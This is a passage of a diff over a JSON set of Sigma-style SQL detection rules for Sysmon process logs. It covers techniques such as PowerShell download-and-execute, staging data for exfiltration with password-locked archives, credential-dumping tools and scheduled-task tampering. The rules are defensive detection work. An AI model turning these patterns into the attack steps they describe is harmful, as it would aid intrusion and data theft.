a sign of exploitation (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", + "title": "Detected Windows Software Discovery", + "id": "e13f668e-7f95-443d-98d2-1816a7648a7b", + "status": "test", + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.discovery", + "attack.t1518" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Legitimate administration activities" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT (ParentImage LIKE '%build%' ESCAPE '\\' AND CommandLine LIKE '%build%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%query%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%svcversion%' ESCAPE '\\')" ], - "filename": "proc_creation_win_java_susp_child_process_2.yml" + "filename": "proc_creation_win_reg_software_discovery.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp", - "id": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "title": "InfDefaultInstall.exe .inf Execution", + "id": "ce7cf472-6fcc-490a-9481-3786840b5d9b", "status": "test", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Compress-Archive %' ESCAPE '\\' AND CommandLine LIKE '% -Path %' ESCAPE '\\' AND CommandLine LIKE '% -DestinationPath %' ESCAPE '\\' AND CommandLine LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%InfDefaultInstall.exe %' ESCAPE '\\' AND CommandLine LIKE '%.inf%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_zip_compress.yml" + "filename": "proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" }, { - "title": "Verclsid.exe Runs COM Object", - "id": "d06be4b9-8045-428b-a567-740a26d9db25", + "title": "Potential Suspicious Registry File Imported Via Reg.EXE", + "id": "62e0298b-e994-4189-bc87-bc699aa62d97", + "status": "experimental", + "description": "Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility", + "author": "frack113, Nasreddine Bencherchali", + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ], + "falsepositives": [ + "Legitimate import of keys" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% import %' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml" + }, + { + "title": "Potential Defense Evasion Via Binary Rename", + "id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", "status": "test", - "description": "Detects when verclsid.exe is used to run COM object via GUID", - "author": "Victor Sergeev, oscd.community", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR OriginalFileName = 'verclsid.exe') AND (CommandLine LIKE '%/S%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('Cmd.Exe', 'CONHOST.EXE', '7z.exe', 'WinRAR.exe', 'wevtutil.exe', 'net.exe', 'net1.exe', 'netsh.exe', 'InstallUtil.exe') AND NOT ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\WinRAR.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_verclsid_runs_com.yml" + "filename": "proc_creation_win_renamed_binary.yml" }, { - "title": "Suspicious Schtasks Schedule Type With High Privileges", - "id": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "title": "PowerShell Web Download and Execution", + "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "status": "experimental", - "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1059" ], "falsepositives": [ - "Some installers were seen using this method of creation unfortunately. Filter them in your environment" + "Scripts or tools that download files and execute them" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\') AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_schedule_type_system.yml" + "filename": "proc_creation_win_powershell_download_iex.yml" }, { - "title": "Potential Privilege Escalation To LOCAL SYSTEM", - "id": "207b0396-3689-42d9-8399-4222658efc99", + "title": "ImagingDevices Unusual Parent/Child Processes", + "id": "f11f2808-adb4-46c0-802a-8660db50fa99", "status": "experimental", - "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND Image LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" + "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" }, { - "title": "PowerShell Web Download and Execution", - "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", - "status": "experimental", - "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "title": "HackTool - SecurityXploded Execution", + "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "status": "stable", + "description": "Detects the execution of SecurityXploded Tools", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1555" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Company = 'SecurityXploded' OR Image LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_hktl_secutyxploded.yml" + }, + { + "title": "Suspicious Modification Of Scheduled Tasks", + "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "status": "experimental", + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1053.005" ], "falsepositives": [ - "Scripts or tools that download files and execute them" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_download_iex.yml" + "filename": "proc_creation_win_schtasks_change.yml" }, { - "title": "PUA - DIT Snapshot Viewer", - "id": "d3b70aad-097e-409c-9df2-450f80dc476b", + "title": "Non-privileged Usage of Reg or Powershell", + "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", "status": "test", - "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", - "author": "Furkan Caliskan (@caliskanfurkan_)", + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate admin usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_ditsnap.yml" + "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" }, { - "title": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE", - "id": "48917adc-a28e-4f5d-b729-11e75da8941f", + "title": "DllUnregisterServer Function Call Via Msiexec.EXE", + "id": "84f52741-8834-4a8c-a413-2eb2269aa6c8", "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. Qbot has been seen using this technique to add exlcusions for folders within AppData and ProgramData.", + "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.007" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Paths%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Paths%' ESCAPE '\\') AND CommandLine LIKE '%ADD %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD %' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND (CommandLine LIKE '% /z %' ESCAPE '\\' OR CommandLine LIKE '% -z %' ESCAPE '\\') AND CommandLine LIKE '%.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_defender_exclusion.yml" + "filename": "proc_creation_win_msiexec_dll.yml" }, { - "title": "Griffon Malware Attack Pattern", - "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", - "status": "experimental", - "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Outlook Child Process", + "id": "208748f7-881d-47ac-a29c-07ea84bf691d", + "status": "test", + "description": "Detects a suspicious process spawning from an Outlook process.", + "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1204.002" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + }, + { + "title": "Winnti Malware HK University Campaign", + "id": "3121461b-5aa0-4a41-b910-66d25524edbb", + "status": "test", + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "author": "Florian Roth (Nextron Systems), Markus Neis", + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentImage LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND Image LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Test.exe' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND Image LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_griffon_patterns.yml" + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" }, { - "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", - "id": "0d5675be-bc88-4172-86d3-1e96a4476536", + "title": "PUA - CsExec Execution", + "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", "status": "experimental", - "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.lateral_movement", - "attack.t1021.001", - "attack.t1112" + "attack.resource_development", + "attack.t1587.001", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" ], - "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" + "filename": "proc_creation_win_pua_csexec.yml" }, { - "title": "Custom Class Execution via Xwizard", - "id": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", + "title": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", + "id": "9fbf5927-5261-4284-a71d-f681029ea574", "status": "test", - "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate activity is expected since compressing files with a password is common." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND CommandLine REGEXP '\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND CommandLine LIKE '% -p%' ESCAPE '\\' AND (CommandLine LIKE '% a %' ESCAPE '\\' OR CommandLine LIKE '% u %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml" + "filename": "proc_creation_win_7zip_password_compression.yml" }, { - "title": "Gzip Archive Decode Via PowerShell", - "id": "98767d61-b2e8-4d71-b661-e36783ee24c1", + "title": "Potential Product Reconnaissance Via Wmic.EXE", + "id": "15434e33-5027-4914-88d5-3d4145ec25a9", "status": "experimental", - "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", - "author": "Hieu Tran", + "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", + "author": "Nasreddine 